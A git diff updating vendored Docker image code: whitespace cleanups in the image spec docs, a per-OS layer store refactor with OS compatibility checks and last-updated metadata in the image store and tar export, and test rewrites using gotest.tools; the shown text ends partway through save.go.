    Container RunConfig Field Descriptions

    -
    User string @@ -234,9 +232,7 @@ whitespace. It has been added to this example for clarity.

    The username or UID which the process in the container should run as. This acts as a default value to use when the value is not specified when creating a container.

    -

    All of the following are valid:

    -
    • user
    • uid
    • @@ -245,7 +241,6 @@ whitespace. It has been added to this example for clarity.
    • uid:group
    • user:gid
    -

    If group/gid is not specified, the default group and supplementary groups of the given user/uid in /etc/passwd @@ -284,13 +279,11 @@ whitespace. It has been added to this example for clarity. map[string]struct{} and is represented in JSON as an object mapping its keys to an empty object. Here is an example: -

    {
         "8080": {},
         "53/udp": {},
         "2356/tcp": {}
     }
    - Its keys can be in the format of:
    • @@ -304,10 +297,8 @@ whitespace. It has been added to this example for clarity.
    with the default protocol being "tcp" if not - specified. - - These values act as defaults and are merged with any specified - when creating a container. + specified. These values act as defaults and are merged with + any specified when creating a container.
    Env array of strings @@ -364,7 +355,6 @@ whitespace. It has been added to this example for clarity.
  • ["CMD", arg1, arg2, ...] : exec arguments directly
  • ["CMD-SHELL", command] : run command with system's default shell
- The test command should exit with a status of 0 if the container is healthy, or with 1 if it is unhealthy. @@ -387,12 +377,10 @@ whitespace. It has been added to this example for clarity. The number of consecutive failures needed to consider a container as unhealthy.
- In each case, the field can be omitted to indicate that the - value should be inherited from the base layer. - - These values act as defaults and are merged with any specified - when creating a container. + value should be inherited from the base layer. These values act + as defaults and are merged with any specified when creating a + container.
Volumes struct @@ -426,7 +414,6 @@ whitespace. It has been added to this example for clarity. The rootfs key references the layer content addresses used by the image. This makes the image config hash depend on the filesystem hash. rootfs has two subkeys: -
  • type is usually set to layers. @@ -435,10 +422,7 @@ whitespace. It has been added to this example for clarity. diff_ids is an array of layer content hashes (DiffIDs), in order from bottom-most to top-most.
- - Here is an example rootfs section: -
"rootfs": {
   "diff_ids": [
     "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
@@ -455,7 +439,6 @@ whitespace. It has been added to this example for clarity.
         history is an array of objects describing the history of
         each layer. The array is ordered from bottom-most layer to top-most
         layer. The object has the following fields.
-
         
  • created: Creation time, expressed as a ISO-8601 formatted @@ -478,9 +461,7 @@ whitespace. It has been added to this example for clarity. filesystem).
- -Here is an example history section: - + Here is an example history section:
"history": [
   {
     "created": "2015-10-31T22:22:54.690851953Z",
diff --git a/vendor/github.com/docker/docker/image/spec/v1.md b/vendor/github.com/docker/docker/image/spec/v1.md
index 57a599b8ff..c1415947f1 100644
--- a/vendor/github.com/docker/docker/image/spec/v1.md
+++ b/vendor/github.com/docker/docker/image/spec/v1.md
@@ -17,12 +17,10 @@ This specification uses the following terms:
     
Images are composed of layers. Image layer is a general term which may be used to refer to one or both of the following: -
  1. The metadata for the layer, described in the JSON format.
  2. The filesystem changes described by a layer.
- To refer to the former you may use the term Layer JSON or Layer Metadata. To refer to the latter you may use the term Image Filesystem Changeset or Image Diff. @@ -92,7 +90,7 @@ This specification uses the following terms: often referred to as a tag as well, though it strictly refers to the full name of an image. Acceptable values for a tag suffix are implementation specific, but they SHOULD be limited to the set of - alphanumeric characters [a-zA-z0-9], punctuation + alphanumeric characters [a-zA-Z0-9], punctuation characters [._-], and MUST NOT contain a : character.
@@ -105,7 +103,7 @@ This specification uses the following terms: my-app:3.1.4, my-app is the Repository component of the name. Acceptable values for repository name are implementation specific, but they SHOULD be limited to the set of - alphanumeric characters [a-zA-z0-9], and punctuation + alphanumeric characters [a-zA-Z0-9], and punctuation characters [._-], however it MAY contain additional / and : characters for organizational purposes, with the last : character being interpreted @@ -244,9 +242,7 @@ Here is an example image JSON file: container using the image. This field can be null, in which case any execution parameters should be specified at creation of the container. -

Container RunConfig Field Descriptions

-
User string @@ -255,9 +251,7 @@ Here is an example image JSON file:

The username or UID which the process in the container should run as. This acts as a default value to use when the value is not specified when creating a container.

-

All of the following are valid:

-
  • user
  • uid
  • @@ -266,7 +260,6 @@ Here is an example image JSON file:
  • uid:group
  • user:gid
-

If group/gid is not specified, the default group and supplementary groups of the given user/uid in /etc/passwd @@ -305,13 +298,11 @@ Here is an example image JSON file: map[string]struct{} and is represented in JSON as an object mapping its keys to an empty object. Here is an example: -

{
     "8080": {},
     "53/udp": {},
     "2356/tcp": {}
 }
- Its keys can be in the format of:
  • @@ -325,9 +316,7 @@ Here is an example image JSON file:
with the default protocol being "tcp" if not - specified. - - These values act as defaults and are merged with any specified + specified. These values act as defaults and are merged with any specified when creating a container.
@@ -440,7 +429,7 @@ f60c56784b83/ my-app-tools ``` -This example change is going add a configuration directory at `/etc/my-app.d` +This example change is going to add a configuration directory at `/etc/my-app.d` which contains a default config file. There's also a change to the `my-app-tools` binary to handle the config layout change. The `f60c56784b83` directory then looks like this: @@ -502,21 +491,21 @@ For example, here's what the full archive of `library/busybox` is (displayed in ``` . ├── 5785b62b697b99a5af6cd5d0aabc804d5748abbb6d3d07da5d1d3795f2dcc83e -│   ├── VERSION -│   ├── json -│   └── layer.tar +│ ├── VERSION +│ ├── json +│ └── layer.tar ├── a7b8b41220991bfc754d7ad445ad27b7f272ab8b4a2c175b9512b97471d02a8a -│   ├── VERSION -│   ├── json -│   └── layer.tar +│ ├── VERSION +│ ├── json +│ └── layer.tar ├── a936027c5ca8bf8f517923169a233e391cbb38469a75de8383b5228dc2d26ceb -│   ├── VERSION -│   ├── json -│   └── layer.tar +│ ├── VERSION +│ ├── json +│ └── layer.tar ├── f60c56784b832dd990022afc120b8136ab3da9528094752ae13fe63a2d28dc8c -│   ├── VERSION -│   ├── json -│   └── layer.tar +│ ├── VERSION +│ ├── json +│ └── layer.tar └── repositories ``` diff --git a/vendor/github.com/docker/docker/image/store.go b/vendor/github.com/docker/docker/image/store.go index b61c456097..9fd7d7dcf3 100644 --- a/vendor/github.com/docker/docker/image/store.go +++ b/vendor/github.com/docker/docker/image/store.go @@ -1,14 +1,17 @@ -package image +package image // import "github.com/docker/docker/image" import ( "encoding/json" - "errors" "fmt" "sync" + "time" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/digestset" "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/system" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // Store is an interface for creating and accessing images @@ -19,9 +22,12 @@ type Store interface { Search(partialID string) (ID, error) SetParent(id ID, parent ID) error GetParent(id ID) (ID, error) + SetLastUpdated(id ID) error + GetLastUpdated(id ID) (time.Time, error) Children(id ID) []ID Map() map[ID]*Image Heads() map[ID]*Image + Len() int } // LayerGetReleaser is a minimal interface for getting and releasing images. @@ -36,20 +42,20 @@ type imageMeta struct { } type store struct { - sync.Mutex - ls LayerGetReleaser + sync.RWMutex + lss map[string]LayerGetReleaser images map[ID]*imageMeta fs StoreBackend - digestSet *digest.Set + digestSet *digestset.Set } -// NewImageStore returns new store object for given layer store -func NewImageStore(fs StoreBackend, ls LayerGetReleaser) (Store, error) { +// NewImageStore returns new store object for given set of layer stores +func NewImageStore(fs StoreBackend, lss map[string]LayerGetReleaser) (Store, error) { is := &store{ - ls: ls, + lss: lss, images: make(map[ID]*imageMeta), fs: fs, - digestSet: digest.NewSet(), + digestSet: digestset.NewSet(), } // load all current images and retain layers @@ -69,8 +75,15 @@ func (is *store) restore() error { } var l layer.Layer if chainID := img.RootFS.ChainID(); chainID != "" { - l, err = is.ls.Get(chainID) + if !system.IsOSSupported(img.OperatingSystem()) { + return system.ErrNotSupportedOperatingSystem + } + l, err = is.lss[img.OperatingSystem()].Get(chainID) if err != nil { + if err == layer.ErrLayerDoesNotExist { + logrus.Errorf("layer does not exist, not restoring image %v, %v, %s", dgst, chainID, img.OperatingSystem()) + return nil + } return err } } @@ -144,9 +157,12 @@ func (is *store) Create(config []byte) (ID, error) { var l layer.Layer if layerID != "" { - l, err = is.ls.Get(layerID) + if !system.IsOSSupported(img.OperatingSystem()) { + return "", system.ErrNotSupportedOperatingSystem + } + l, err = is.lss[img.OperatingSystem()].Get(layerID) if err != nil { - return "", err + return "", errors.Wrapf(err, "failed to get layer %s", layerID) } } @@ -164,16 +180,21 @@ func (is *store) Create(config []byte) (ID, error) { return imageID, nil } -func (is *store) Search(term string) (ID, error) { - is.Lock() - defer is.Unlock() +type imageNotFoundError string + +func (e imageNotFoundError) Error() string { + return "No such image: " + string(e) +} + +func (imageNotFoundError) NotFound() {} +func (is *store) Search(term string) (ID, error) { dgst, err := is.digestSet.Lookup(term) if err != nil { - if err == digest.ErrDigestNotFound { - err = fmt.Errorf("No such image: %s", term) + if err == digestset.ErrDigestNotFound { + err = imageNotFoundError(term) } - return "", err + return "", errors.WithStack(err) } return IDFromDigest(dgst), nil } @@ -208,6 +229,13 @@ func (is *store) Delete(id ID) ([]layer.Metadata, error) { if imageMeta == nil { return nil, fmt.Errorf("unrecognized image ID %s", id.String()) } + img, err := is.Get(id) + if err != nil { + return nil, fmt.Errorf("unrecognized image %s, %v", id.String(), err) + } + if !system.IsOSSupported(img.OperatingSystem()) { + return nil, fmt.Errorf("unsupported image operating system %q", img.OperatingSystem()) + } for id := range imageMeta.children { is.fs.DeleteMetadata(id.Digest(), "parent") } @@ -222,7 +250,7 @@ func (is *store) Delete(id ID) ([]layer.Metadata, error) { is.fs.Delete(id.Digest()) if imageMeta.layer != nil { - return is.ls.Release(imageMeta.layer) + return is.lss[img.OperatingSystem()].Release(imageMeta.layer) } return nil, nil } @@ -249,9 +277,25 @@ func (is *store) GetParent(id ID) (ID, error) { return ID(d), nil // todo: validate? } +// SetLastUpdated time for the image ID to the current time +func (is *store) SetLastUpdated(id ID) error { + lastUpdated := []byte(time.Now().Format(time.RFC3339Nano)) + return is.fs.SetMetadata(id.Digest(), "lastUpdated", lastUpdated) +} + +// GetLastUpdated time for the image ID +func (is *store) GetLastUpdated(id ID) (time.Time, error) { + bytes, err := is.fs.GetMetadata(id.Digest(), "lastUpdated") + if err != nil || len(bytes) == 0 { + // No lastUpdated time + return time.Time{}, nil + } + return time.Parse(time.RFC3339Nano, string(bytes)) +} + func (is *store) Children(id ID) []ID { - is.Lock() - defer is.Unlock() + is.RLock() + defer is.RUnlock() return is.children(id) } @@ -275,8 +319,8 @@ func (is *store) Map() map[ID]*Image { } func (is *store) imagesMap(all bool) map[ID]*Image { - is.Lock() - defer is.Unlock() + is.RLock() + defer is.RUnlock() images := make(map[ID]*Image) @@ -293,3 +337,9 @@ func (is *store) imagesMap(all bool) map[ID]*Image { } return images } + +func (is *store) Len() int { + is.RLock() + defer is.RUnlock() + return len(is.images) +} diff --git a/vendor/github.com/docker/docker/image/store_test.go b/vendor/github.com/docker/docker/image/store_test.go index 50f8aa8b84..0edf3282af 100644 --- a/vendor/github.com/docker/docker/image/store_test.go +++ b/vendor/github.com/docker/docker/image/store_test.go @@ -1,292 +1,189 @@ -package image +package image // import "github.com/docker/docker/image" import ( - "io/ioutil" - "os" + "fmt" + "runtime" "testing" - "github.com/docker/distribution/digest" "github.com/docker/docker/layer" + "github.com/opencontainers/go-digest" + "gotest.tools/assert" + "gotest.tools/assert/cmp" ) func TestRestore(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } + fs, cleanup := defaultFSStoreBackend(t) + defer cleanup() id1, err := fs.Set([]byte(`{"comment": "abc", "rootfs": {"type": "layers"}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + _, err = fs.Set([]byte(`invalid`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + id2, err := fs.Set([]byte(`{"comment": "def", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + err = fs.SetMetadata(id2, "parent", []byte(id1)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - is, err := NewImageStore(fs, &mockLayerGetReleaser{}) - if err != nil { - t.Fatal(err) - } + mlgrMap := make(map[string]LayerGetReleaser) + mlgrMap[runtime.GOOS] = &mockLayerGetReleaser{} + is, err := NewImageStore(fs, mlgrMap) + assert.NilError(t, err) - imgs := is.Map() - if actual, expected := len(imgs), 2; actual != expected { - t.Fatalf("invalid images length, expected 2, got %q", len(imgs)) - } + assert.Check(t, cmp.Len(is.Map(), 2)) img1, err := is.Get(ID(id1)) - if err != nil { - t.Fatal(err) - } - - if actual, expected := img1.computedID, ID(id1); actual != expected { - t.Fatalf("invalid image ID: expected %q, got %q", expected, actual) - } - - if actual, expected := img1.computedID.String(), string(id1); actual != expected { - t.Fatalf("invalid image ID string: expected %q, got %q", expected, actual) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal(ID(id1), img1.computedID)) + assert.Check(t, cmp.Equal(string(id1), img1.computedID.String())) img2, err := is.Get(ID(id2)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal("abc", img1.Comment)) + assert.Check(t, cmp.Equal("def", img2.Comment)) - if actual, expected := img1.Comment, "abc"; actual != expected { - t.Fatalf("invalid comment for image1: expected %q, got %q", expected, actual) - } + _, err = is.GetParent(ID(id1)) + assert.ErrorContains(t, err, "failed to read metadata") - if actual, expected := img2.Comment, "def"; actual != expected { - t.Fatalf("invalid comment for image2: expected %q, got %q", expected, actual) - } - - p, err := is.GetParent(ID(id1)) - if err == nil { - t.Fatal("expected error for getting parent") - } - - p, err = is.GetParent(ID(id2)) - if err != nil { - t.Fatal(err) - } - if actual, expected := p, ID(id1); actual != expected { - t.Fatalf("invalid parent: expected %q, got %q", expected, actual) - } + p, err := is.GetParent(ID(id2)) + assert.NilError(t, err) + assert.Check(t, cmp.Equal(ID(id1), p)) children := is.Children(ID(id1)) - if len(children) != 1 { - t.Fatalf("invalid children length: %q", len(children)) - } - if actual, expected := children[0], ID(id2); actual != expected { - t.Fatalf("invalid child for id1: expected %q, got %q", expected, actual) - } - - heads := is.Heads() - if actual, expected := len(heads), 1; actual != expected { - t.Fatalf("invalid images length: expected %q, got %q", expected, actual) - } + assert.Check(t, cmp.Len(children, 1)) + assert.Check(t, cmp.Equal(ID(id2), children[0])) + assert.Check(t, cmp.Len(is.Heads(), 1)) sid1, err := is.Search(string(id1)[:10]) - if err != nil { - t.Fatal(err) - } - if actual, expected := sid1, ID(id1); actual != expected { - t.Fatalf("searched ID mismatch: expected %q, got %q", expected, actual) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal(ID(id1), sid1)) sid1, err = is.Search(digest.Digest(id1).Hex()[:6]) - if err != nil { - t.Fatal(err) - } - if actual, expected := sid1, ID(id1); actual != expected { - t.Fatalf("searched ID mismatch: expected %q, got %q", expected, actual) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal(ID(id1), sid1)) invalidPattern := digest.Digest(id1).Hex()[1:6] _, err = is.Search(invalidPattern) - if err == nil { - t.Fatalf("expected search for %q to fail", invalidPattern) - } - + assert.ErrorContains(t, err, "No such image") } func TestAddDelete(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } - - is, err := NewImageStore(fs, &mockLayerGetReleaser{}) - if err != nil { - t.Fatal(err) - } + is, cleanup := defaultImageStore(t) + defer cleanup() id1, err := is.Create([]byte(`{"comment": "abc", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`)) - if err != nil { - t.Fatal(err) - } - - if actual, expected := id1, ID("sha256:8d25a9c45df515f9d0fe8e4a6b1c64dd3b965a84790ddbcc7954bb9bc89eb993"); actual != expected { - t.Fatalf("create ID mismatch: expected %q, got %q", expected, actual) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal(ID("sha256:8d25a9c45df515f9d0fe8e4a6b1c64dd3b965a84790ddbcc7954bb9bc89eb993"), id1)) img, err := is.Get(id1) - if err != nil { - t.Fatal(err) - } - - if actual, expected := img.Comment, "abc"; actual != expected { - t.Fatalf("invalid comment in image: expected %q, got %q", expected, actual) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal("abc", img.Comment)) id2, err := is.Create([]byte(`{"comment": "def", "rootfs": {"type": "layers", "diff_ids": ["2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae"]}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) err = is.SetParent(id2, id1) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) pid1, err := is.GetParent(id2) - if err != nil { - t.Fatal(err) - } - if actual, expected := pid1, id1; actual != expected { - t.Fatalf("invalid parent for image: expected %q, got %q", expected, actual) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal(pid1, id1)) _, err = is.Delete(id1) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + _, err = is.Get(id1) - if err == nil { - t.Fatalf("expected get for deleted image %q to fail", id1) - } + assert.ErrorContains(t, err, "failed to get digest") + _, err = is.Get(id2) - if err != nil { - t.Fatal(err) - } - pid1, err = is.GetParent(id2) - if err == nil { - t.Fatalf("expected parent check for image %q to fail, got %q", id2, pid1) - } + assert.NilError(t, err) + _, err = is.GetParent(id2) + assert.ErrorContains(t, err, "failed to read metadata") } func TestSearchAfterDelete(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } - - is, err := NewImageStore(fs, &mockLayerGetReleaser{}) - if err != nil { - t.Fatal(err) - } + is, cleanup := defaultImageStore(t) + defer cleanup() id, err := is.Create([]byte(`{"comment": "abc", "rootfs": {"type": "layers"}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) id1, err := is.Search(string(id)[:15]) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + assert.Check(t, cmp.Equal(id1, id)) - if actual, expected := id1, id; expected != actual { - t.Fatalf("wrong id returned from search: expected %q, got %q", expected, actual) - } - - if _, err := is.Delete(id); err != nil { - t.Fatal(err) - } + _, err = is.Delete(id) + assert.NilError(t, err) - if _, err := is.Search(string(id)[:15]); err == nil { - t.Fatal("expected search after deletion to fail") - } + _, err = is.Search(string(id)[:15]) + assert.ErrorContains(t, err, "No such image") } func TestParentReset(t *testing.T) { - tmpdir, err := ioutil.TempDir("", "images-fs-store") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(tmpdir) - fs, err := NewFSStoreBackend(tmpdir) - if err != nil { - t.Fatal(err) - } - - is, err := NewImageStore(fs, &mockLayerGetReleaser{}) - if err != nil { - t.Fatal(err) - } + is, cleanup := defaultImageStore(t) + defer cleanup() id, err := is.Create([]byte(`{"comment": "abc1", "rootfs": {"type": "layers"}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) id2, err := is.Create([]byte(`{"comment": "abc2", "rootfs": {"type": "layers"}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) id3, err := is.Create([]byte(`{"comment": "abc3", "rootfs": {"type": "layers"}}`)) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - if err := is.SetParent(id, id2); err != nil { - t.Fatal(err) - } + assert.Check(t, is.SetParent(id, id2)) + assert.Check(t, cmp.Len(is.Children(id2), 1)) - ids := is.Children(id2) - if actual, expected := len(ids), 1; expected != actual { - t.Fatalf("wrong number of children: %d, got %d", expected, actual) - } + assert.Check(t, is.SetParent(id, id3)) + assert.Check(t, cmp.Len(is.Children(id2), 0)) + assert.Check(t, cmp.Len(is.Children(id3), 1)) +} - if err := is.SetParent(id, id3); err != nil { - t.Fatal(err) - } +func defaultImageStore(t *testing.T) (Store, func()) { + fsBackend, cleanup := defaultFSStoreBackend(t) - ids = is.Children(id2) - if actual, expected := len(ids), 0; expected != actual { - t.Fatalf("wrong number of children after parent reset: %d, got %d", expected, actual) - } + mlgrMap := make(map[string]LayerGetReleaser) + mlgrMap[runtime.GOOS] = &mockLayerGetReleaser{} + store, err := NewImageStore(fsBackend, mlgrMap) + assert.NilError(t, err) - ids = is.Children(id3) - if actual, expected := len(ids), 1; expected != actual { - t.Fatalf("wrong number of children after parent reset: %d, got %d", expected, actual) - } + return store, cleanup +} + +func TestGetAndSetLastUpdated(t *testing.T) { + store, cleanup := defaultImageStore(t) + defer cleanup() + + id, err := store.Create([]byte(`{"comment": "abc1", "rootfs": {"type": "layers"}}`)) + assert.NilError(t, err) + + updated, err := store.GetLastUpdated(id) + assert.NilError(t, err) + assert.Check(t, cmp.Equal(updated.IsZero(), true)) + assert.Check(t, store.SetLastUpdated(id)) + + updated, err = store.GetLastUpdated(id) + assert.NilError(t, err) + assert.Check(t, cmp.Equal(updated.IsZero(), false)) +} + +func TestStoreLen(t *testing.T) { + store, cleanup := defaultImageStore(t) + defer cleanup() + + expected := 10 + for i := 0; i < expected; i++ { + _, err := store.Create([]byte(fmt.Sprintf(`{"comment": "abc%d", "rootfs": {"type": "layers"}}`, i))) + assert.NilError(t, err) + } + numImages := store.Len() + assert.Equal(t, expected, numImages) + assert.Equal(t, len(store.Map()), numImages) } type mockLayerGetReleaser struct{} diff --git a/vendor/github.com/docker/docker/image/tarexport/load.go b/vendor/github.com/docker/docker/image/tarexport/load.go index 01edd91fb7..c89dd08f93 100644 --- a/vendor/github.com/docker/docker/image/tarexport/load.go +++ b/vendor/github.com/docker/docker/image/tarexport/load.go @@ -1,17 +1,18 @@ -package tarexport +package tarexport // import "github.com/docker/docker/image/tarexport" import ( "encoding/json" + "errors" "fmt" "io" "io/ioutil" "os" "path/filepath" "reflect" + "runtime" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/image" "github.com/docker/docker/image/v1" "github.com/docker/docker/layer" @@ -22,18 +23,16 @@ import ( "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/pkg/symlink" "github.com/docker/docker/pkg/system" - "github.com/docker/docker/reference" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" ) func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) error { - var ( - sf = streamformatter.NewJSONStreamFormatter() - progressOutput progress.Output - ) + var progressOutput progress.Output if !quiet { - progressOutput = sf.NewProgressOutput(outStream, false) + progressOutput = streamformatter.NewJSONProgressOutput(outStream, false) } - outStream = &streamformatter.StdoutFormatter{Writer: outStream, StreamFormatter: streamformatter.NewJSONStreamFormatter()} + outStream = streamformatter.NewStdoutWriter(outStream) tmpDir, err := ioutil.TempDir("", "docker-import-") if err != nil { @@ -80,12 +79,25 @@ func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) if err != nil { return err } - var rootFS image.RootFS - rootFS = *img.RootFS + if err := checkCompatibleOS(img.OS); err != nil { + return err + } + rootFS := *img.RootFS rootFS.DiffIDs = nil if expected, actual := len(m.Layers), len(img.RootFS.DiffIDs); expected != actual { - return fmt.Errorf("invalid manifest, layers length mismatch: expected %q, got %q", expected, actual) + return fmt.Errorf("invalid manifest, layers length mismatch: expected %d, got %d", expected, actual) + } + + // On Windows, validate the platform, defaulting to windows if not present. + os := img.OS + if os == "" { + os = runtime.GOOS + } + if runtime.GOOS == "windows" { + if (os != "windows") && (os != "linux") { + return fmt.Errorf("configuration for this image has an unsupported operating system: %s", os) + } } for i, diffID := range img.RootFS.DiffIDs { @@ -95,14 +107,14 @@ func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) } r := rootFS r.Append(diffID) - newLayer, err := l.ls.Get(r.ChainID()) + newLayer, err := l.lss[os].Get(r.ChainID()) if err != nil { - newLayer, err = l.loadLayer(layerPath, rootFS, diffID.String(), m.LayerSources[diffID], progressOutput) + newLayer, err = l.loadLayer(layerPath, rootFS, diffID.String(), os, m.LayerSources[diffID], progressOutput) if err != nil { return err } } - defer layer.ReleaseAndLog(l.ls, newLayer) + defer layer.ReleaseAndLog(l.lss[os], newLayer) if expected, actual := diffID, newLayer.DiffID(); expected != actual { return fmt.Errorf("invalid diffID for layer %d: expected %q, got %q", i, expected, actual) } @@ -117,7 +129,7 @@ func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) imageRefCount = 0 for _, repoTag := range m.RepoTags { - named, err := reference.ParseNamed(repoTag) + named, err := reference.ParseNormalizedNamed(repoTag) if err != nil { return err } @@ -126,7 +138,7 @@ func (l *tarexporter) Load(inTar io.ReadCloser, outStream io.Writer, quiet bool) return fmt.Errorf("invalid tag %q", repoTag) } l.setLoadedTag(ref, imgID.Digest(), outStream) - outStream.Write([]byte(fmt.Sprintf("Loaded image: %s\n", ref))) + outStream.Write([]byte(fmt.Sprintf("Loaded image: %s\n", reference.FamiliarString(ref)))) imageRefCount++ } @@ -164,7 +176,7 @@ func (l *tarexporter) setParentID(id, parentID image.ID) error { return l.is.SetParent(id, parentID) } -func (l *tarexporter) loadLayer(filename string, rootFS image.RootFS, id string, foreignSrc distribution.Descriptor, progressOutput progress.Output) (layer.Layer, error) { +func (l *tarexporter) loadLayer(filename string, rootFS image.RootFS, id string, os string, foreignSrc distribution.Descriptor, progressOutput progress.Output) (layer.Layer, error) { // We use system.OpenSequential to use sequential file access on Windows, avoiding // depleting the standby list. On Linux, this equates to a regular os.Open. rawTar, err := system.OpenSequential(filename) @@ -193,24 +205,25 @@ func (l *tarexporter) loadLayer(filename string, rootFS image.RootFS, id string, } defer inflatedLayerData.Close() - if ds, ok := l.ls.(layer.DescribableStore); ok { + if ds, ok := l.lss[os].(layer.DescribableStore); ok { return ds.RegisterWithDescriptor(inflatedLayerData, rootFS.ChainID(), foreignSrc) } - return l.ls.Register(inflatedLayerData, rootFS.ChainID()) + return l.lss[os].Register(inflatedLayerData, rootFS.ChainID()) } -func (l *tarexporter) setLoadedTag(ref reference.NamedTagged, imgID digest.Digest, outStream io.Writer) error { +func (l *tarexporter) setLoadedTag(ref reference.Named, imgID digest.Digest, outStream io.Writer) error { if prevID, err := l.rs.Get(ref); err == nil && prevID != imgID { - fmt.Fprintf(outStream, "The image %s already exists, renaming the old one with ID %s to empty string\n", ref.String(), string(prevID)) // todo: this message is wrong in case of multiple tags + fmt.Fprintf(outStream, "The image %s already exists, renaming the old one with ID %s to empty string\n", reference.FamiliarString(ref), string(prevID)) // todo: this message is wrong in case of multiple tags } - if err := l.rs.AddTag(ref, imgID, true); err != nil { - return err - } - return nil + return l.rs.AddTag(ref, imgID, true) } func (l *tarexporter) legacyLoad(tmpDir string, outStream io.Writer, progressOutput progress.Output) error { + if runtime.GOOS == "windows" { + return errors.New("Windows does not support legacy loading of images") + } + legacyLoadedMap := make(map[string]image.ID) dirs, err := ioutil.ReadDir(tmpDir) @@ -249,7 +262,7 @@ func (l *tarexporter) legacyLoad(tmpDir string, outStream io.Writer, progressOut if !ok { return fmt.Errorf("invalid target ID: %v", oldID) } - named, err := reference.WithName(name) + named, err := reference.ParseNormalizedNamed(name) if err != nil { return err } @@ -278,11 +291,21 @@ func (l *tarexporter) legacyLoadImage(oldID, sourceDir string, loadedMap map[str return err } - var img struct{ Parent string } + var img struct { + OS string + Parent string + } if err := json.Unmarshal(imageJSON, &img); err != nil { return err } + if err := checkCompatibleOS(img.OS); err != nil { + return err + } + if img.OS == "" { + img.OS = runtime.GOOS + } + var parentID image.ID if img.Parent != "" { for { @@ -315,7 +338,7 @@ func (l *tarexporter) legacyLoadImage(oldID, sourceDir string, loadedMap map[str if err != nil { return err } - newLayer, err := l.loadLayer(layerPath, *rootFS, oldID, distribution.Descriptor{}, progressOutput) + newLayer, err := l.loadLayer(layerPath, *rootFS, oldID, img.OS, distribution.Descriptor{}, progressOutput) if err != nil { return err } @@ -336,7 +359,7 @@ func (l *tarexporter) legacyLoadImage(oldID, sourceDir string, loadedMap map[str return err } - metadata, err := l.ls.Release(newLayer) + metadata, err := l.lss[img.OS].Release(newLayer) layer.LogReleaseMetadata(metadata) if err != nil { return err @@ -388,3 +411,19 @@ func checkValidParent(img, parent *image.Image) bool { } return true } + +func checkCompatibleOS(imageOS string) error { + // always compatible if the images OS matches the host OS; also match an empty image OS + if imageOS == runtime.GOOS || imageOS == "" { + return nil + } + // On non-Windows hosts, for compatibility, fail if the image is Windows. + if runtime.GOOS != "windows" && imageOS == "windows" { + return fmt.Errorf("cannot load %s image on %s", imageOS, runtime.GOOS) + } + // Finally, check the image OS is supported for the platform. + if err := system.ValidatePlatform(system.ParsePlatform(imageOS)); err != nil { + return fmt.Errorf("cannot load %s image on %s: %s", imageOS, runtime.GOOS, err) + } + return nil +} diff --git a/vendor/github.com/docker/docker/image/tarexport/save.go b/vendor/github.com/docker/docker/image/tarexport/save.go index 6e3a5bc589..4e734b3503 100644 --- a/vendor/github.com/docker/docker/image/tarexport/save.go +++ b/vendor/github.com/docker/docker/image/tarexport/save.go @@ -1,4 +1,4 @@ -package tarexport +package tarexport // import "github.com/docker/docker/image/tarexport" import ( "encoding/json" @@ -6,22 +6,27 @@ import ( "io" "io/ioutil" "os" + "path" "path/filepath" + "runtime" "time" "github.com/docker/distribution" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/image" "github.com/docker/docker/image/v1" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/system" - "github.com/docker/docker/reference" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" ) type imageDescriptor struct { - refs 